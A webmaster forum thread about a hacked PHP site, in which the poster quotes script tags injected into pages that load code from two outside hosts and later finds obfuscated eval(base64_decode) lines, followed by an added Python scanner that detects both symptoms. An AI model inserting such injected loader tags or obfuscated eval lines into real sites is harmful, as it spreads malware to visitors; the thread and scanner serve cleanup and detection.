Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag (<body>) the following code is added automatically:
<script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
Can anyone throw some light upon this? My site is being blacklisted by Chrome.
Could it be coming from the database, that is, if your site is using a database?
I'm using a database indeed. But the portion where the code is inserted does not contain any database print. The code of the page is like:
<?php require 'template/header.php'; ?>
(THE CODE IS INSERTED HERE)
<?php require 'template/top.php'; ?>
<?php require 'category_list.php'; ?>
<?php require 'product_display.php'; ?>
Check to see if a user figured out a way to enter info into your database.
But how (and from where) can it be injected in such a place where the actual code is clean (does not have any echo/print/document.write there)?
Some more details of the error:
FTP could be another hack. Gumblar works on the principle that the file download offered (usually a PDF) is the infection point and what steals passwords and logins to FTP and then logs in, grabs the index page, modifies it and then uploads it back to the server.
(So go now, change your login to your server. If that cures it, then consider moving all your development to a separate user account on your computer and keep one user account for web surfing, etc. Safest policy if you work on one machine but also surf from it.)
Check with the web host company that they have not done this or if the server has been compromised by a new client, etc. Poor back end security and a buggy PHP and SQL all go miles to helping the hackers.
Check what PHP and SQL versions you're running on. If your host is running PHP < 5.0, then you possibly are being hacked through PHP itself from a known security bug that allows for server-side hacks to be made. MySQL is another technology that people will hack and inject data into if they find hackable or exploitable PHP installs.
So start asking questions of your host and if they have any server-side firewalls, I am not talking about what is on the outside but internals, do they have a firewall policy between servers and networks connected to them or are they an eggs in one basket host? (in it for the money)
Tell your hosting provider about the problem and they should be able to help you figure it out.
Thanks for your response. Some extra code was added into some PHP files as:
<?php eval(base64_decode('....')); ?>
Again, a lot of thanks to you all for taking out your time and replying.
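For anyone cleaning up after the same compromise, here is an added example (not code from any poster in this thread) that scans a web root for the two symptoms reported above: eval(base64_decode( calls in source files, and script tags sitting between </head> and <body>. The function names, the extension list and the sample files are assumptions made for illustration, and the </head>/<body> check only fires when both tags are in the same file, such as static HTML or a saved copy of the rendered page.

```python
import re
import tempfile
from pathlib import Path

# Symptom 1 from the thread: an eval(base64_decode(...)) line added to PHP files.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
# Symptom 2: markup between </head> and <body>, where nothing legitimate belongs.
HEAD_BODY_GAP = re.compile(rb"</head\s*>(.*?)<body\b", re.I | re.S)
SCRIPT_SRC = re.compile(rb"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
EXTENSIONS = {".php", ".html", ".htm", ".inc", ".tpl"}  # assumed list, adjust per site

def scan_file(path):
    """Return sorted (line_number, finding) tuples for one file."""
    data = path.read_bytes()
    findings = []
    for m in EVAL_B64.finditer(data):
        line = data.count(b"\n", 0, m.start()) + 1
        findings.append((line, "eval(base64_decode(...)) call"))
    for gap in HEAD_BODY_GAP.finditer(data):
        for s in SCRIPT_SRC.finditer(gap.group(1)):
            line = data.count(b"\n", 0, gap.start(1) + s.start()) + 1
            src = s.group(1).decode("ascii", "replace")
            findings.append((line, "script between </head> and <body>: " + src))
    return sorted(findings)

def scan_tree(root):
    """Walk a web root; map relative path -> findings for every flagged file."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = scan_file(path)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def build_sample(root):
    """Write constructed sample files (not taken from the thread) for a self-check."""
    root = Path(root)
    (root / "template").mkdir()
    (root / "template" / "header.php").write_text("<?php eval(base64_decode('QQ==')); ?>\n<html><head></head>\n")
    (root / "index.html").write_text("<html><head></head>\n<script src=http://injected.example/images/gifimg.php ></script>\n<body></body></html>\n")
    (root / "clean.php").write_text("<?php require 'template/top.php'; ?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        for name, hits in scan_tree(d).items():
            for line, what in hits:
                print(f"{name}:{line}: {what}")
```

Run scan_tree against a local copy of the site; every flagged file should be compared with a known-good backup before it is restored, since a hit only says where to look.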